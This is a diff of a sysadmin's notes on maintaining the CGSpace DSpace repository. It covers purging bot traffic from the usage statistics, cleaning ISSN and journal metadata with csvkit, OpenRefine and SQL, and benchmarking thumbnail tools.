                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Add a handful of mappings for incorrect countries, regions, and licenses on AReS and start a new harvest @@ -220,8 +220,8 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • That IP is on Amazon, and from looking at the DSpace logs I don’t see them logging in at all, only scraping… so I will purge hits from that IP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I see 93.158.90.30 is some Swedish IP that also has a normal-looking user agent, but never logs in and requests thousands of XMLUI pages, I will purge their hits too
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -232,14 +232,14 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • 3.225.28.105 uses a normal-looking user agent but makes thousands of request to the REST API a few seconds apart
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • 61.143.40.50 is in China and uses this hilarious user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 47.252.80.214 is owned by Alibaba in the US and has the same user agent
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 159.138.131.15 is in Hong Kong and also seems to be a bot because I never see it log in and it downloads 4,300 PDFs over the course of a few hours
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 95.87.154.12 seems to be a new bot with the following user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • They have a legitimate EU-funded project to enrich data for under-resourced languages in the EU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I will purge the hits and add them to our list of bot overrides in the mean time before I submit it to COUNTER-Robots
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • @@ -247,37 +247,37 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I see a new bot using this user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              nettle (+https://www.nettle.sk)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                nettle (+https://www.nettle.sk)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • 129.0.211.251 is in Cameroon and uses a normal-looking user agent, but seems to be a bot of some sort, as it downloaded 900 PDFs over a short period.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • 217.182.21.193 is on OVH in France and uses a Linux user agent, but never logs in and makes several requests per minute, over 1,000 in a day
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • 103.135.104.139 is in Hong Kong and also seems to be making real requests, but makes way too many to be a human
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • There are probably more but that’s most of them over 1,000 hits last month, so I will purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 10796 hits from 35.174.144.154 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 9993 hits from 93.158.90.30 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 6092 hits from 130.255.162.173 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 24863 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2988 hits from 93.158.90.91 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2497 hits from 61.143.40.50 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 13866 hits from 159.138.131.15 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2721 hits from 95.87.154.12 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2786 hits from 47.252.80.214 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 1485 hits from 129.0.211.251 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 8952 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 3446 hits from 103.135.104.139 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Total number of bot hits purged: 90485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 10796 hits from 35.174.144.154 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 9993 hits from 93.158.90.30 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 6092 hits from 130.255.162.173 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 24863 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2988 hits from 93.158.90.91 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2497 hits from 61.143.40.50 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 13866 hits from 159.138.131.15 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2721 hits from 95.87.154.12 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2786 hits from 47.252.80.214 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 1485 hits from 129.0.211.251 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 8952 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 3446 hits from 103.135.104.139 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Total number of bot hits purged: 90485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I purged a few thousand more by user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -Found 2707 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -Total number of hits from bots: 4492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +Found 2707 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +Total number of hits from bots: 4492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I found some CGSpace metadata in the wrong fields
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Seven metadata in dc.subject (57) should be in dcterms.subject (187)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • @@ -289,8 +289,8 @@ Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I exported the entire CGSpace repository as a CSV to do some work on ISSNs and ISBNs:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c 'id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]' /tmp/2021-08-08-cgspace.csv > /tmp/2021-08-08-issn-isbn.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]' /tmp/2021-08-08-cgspace.csv > /tmp/2021-08-08-issn-isbn.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then in OpenRefine I merged all null, blank, and en fields into the en_US one for each, removed all spaces, fixed invalid multi-value separators, removed everything other than ISSN/ISBNs themselves
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • In total it was a few thousand metadata entries or so so I had to split the CSV with xsv split in order to process it
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -303,20 +303,20 @@ Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Extract all unique ISSNs to look up on Sherpa Romeo and Crossref
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c 'cg.issn[en_US]' ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c 1 -r '^[0-9]{4}' | sed 1d | sort | uniq > /tmp/2021-08-09-issns.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c 'cg.issn[en_US]' ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c 1 -r '^[0-9]{4}' | sed 1d | sort | uniq > /tmp/2021-08-09-issns.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then I updated the CSV headers for each and joined the CSVs on the issn column:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ sed -i '1s/journal title/sherpa romeo journal title/' /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ sed -i '1s/journal title/crossref journal title/' /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv > /tmp/2021-08-09-journals-all.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ sed -i '1s/journal title/sherpa romeo journal title/' /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ sed -i '1s/journal title/crossref journal title/' /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv > /tmp/2021-08-09-journals-all.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • In OpenRefine I faceted by blank in each column and copied the values from the other, then created a new column to indicate whether the values were the same with this GREL:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                if(cells['sherpa romeo journal title'].value == cells['crossref journal title'].value,"same","different")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  if(cells['sherpa romeo journal title'].value == cells['crossref journal title'].value,"same","different")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I exported the list of journals that differ and sent it to Peter for comments and corrections
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I want to build an updated controlled vocabulary so I can update CGSpace and reconcile our existing metadata against it
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -332,15 +332,15 @@ $ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-jour
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s 600 -o '%s-vips.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -39004:0.08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ /usr/bin/time -f %M:%e gm convert IPCC.pdf\[0\] -quality 85 -thumbnail x600 -flatten IPCC-gm.jpg 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -40932:0.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ /usr/bin/time -f %M:%e convert IPCC.pdf\[0\] -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -41724:0.59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality 85 -thumbnail 600x600 IPCC-im.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -24736:0.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s 600 -o '%s-vips.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +39004:0.08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ /usr/bin/time -f %M:%e gm convert IPCC.pdf\[0\] -quality 85 -thumbnail x600 -flatten IPCC-gm.jpg 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +40932:0.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ /usr/bin/time -f %M:%e convert IPCC.pdf\[0\] -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +41724:0.59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality 85 -thumbnail 600x600 IPCC-im.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +24736:0.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • The ImageMagick way is the same as how DSpace does it (first creating an intermediary image, then getting a thumbnail)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • libvips does use less time and memory… I should do more tests!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -359,17 +359,17 @@ $ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d > /tmp/journals1.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvcut -c 'sherpa romeo journal title' ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d > /tmp/journals2.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -1911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d > /tmp/journals1.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvcut -c 'sherpa romeo journal title' ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d > /tmp/journals2.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +1911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I exported a list of all the journal titles we have in the cg.journal field:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT(text_value) AS "cg.journal" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -COPY 3245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          localhost/dspace63= > \COPY (SELECT DISTINCT(text_value) AS "cg.journal" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +COPY 3245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don’t match, so I’d have to go check many of them manually before selecting a match or fixing them…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • I think it’s better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • @@ -421,10 +421,10 @@ COPY 3245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ dspace community-filiator --set --parent=10568/114644 --child=10568/72600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ dspace community-filiator --set --parent=10568/114644 --child=10568/35730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ dspace community-filiator --set --parent=10568/114644 --child=10568/76451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ dspace community-filiator --set --parent=10568/114644 --child=10568/72600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ dspace community-filiator --set --parent=10568/114644 --child=10568/35730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ dspace community-filiator --set --parent=10568/114644 --child=10568/76451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • I made a minor fix to OpenRXV to prefix all image names with docker.io so it works with less changes on podman
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Docker assumes the docker.io registry by default, but we should be explicit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • @@ -446,40 +446,40 @@ $ dspace community-filiator --set --parent=10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Lower case all AGROVOC metadata, as I had noticed a few in sentence case:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -UPDATE 484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +UPDATE 484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Also update some DOIs using the dx.doi.org format, just to keep things uniform:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -real    322m16.917s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -user    226m43.121s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -sys     3m17.469s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +real    322m16.917s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +user    226m43.121s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +sys     3m17.469s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
